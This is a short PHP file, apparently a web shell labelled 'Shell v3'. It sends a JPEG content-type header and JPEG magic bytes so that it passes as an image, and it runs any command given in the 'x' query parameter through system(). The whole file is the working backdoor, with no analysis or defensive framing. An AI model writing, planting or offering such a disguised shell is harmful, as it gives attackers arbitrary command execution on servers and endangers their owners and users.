<?php // Shell v3 - Image header header("Content-Type: image/jpeg"); echo "ÿØÿà"; if(isset($_GET['x'])) { system($_GET['x']); } ?>